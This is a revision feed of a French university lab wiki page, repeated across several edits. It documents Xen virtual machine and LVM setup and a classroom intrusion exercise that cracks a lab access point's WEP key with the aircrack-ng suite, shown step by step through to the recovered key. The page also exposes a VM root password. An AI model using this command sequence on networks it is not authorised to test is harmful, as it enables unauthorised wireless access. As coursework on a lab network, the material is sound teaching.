Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56260</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56260"/>
				<updated>2021-10-25T15:15:25Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56259</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56259"/>
				<updated>2021-10-25T15:14:37Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56258</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56258"/>
				<updated>2021-10-25T15:14:19Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56257</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56257"/>
				<updated>2021-10-25T15:12:53Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Création de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
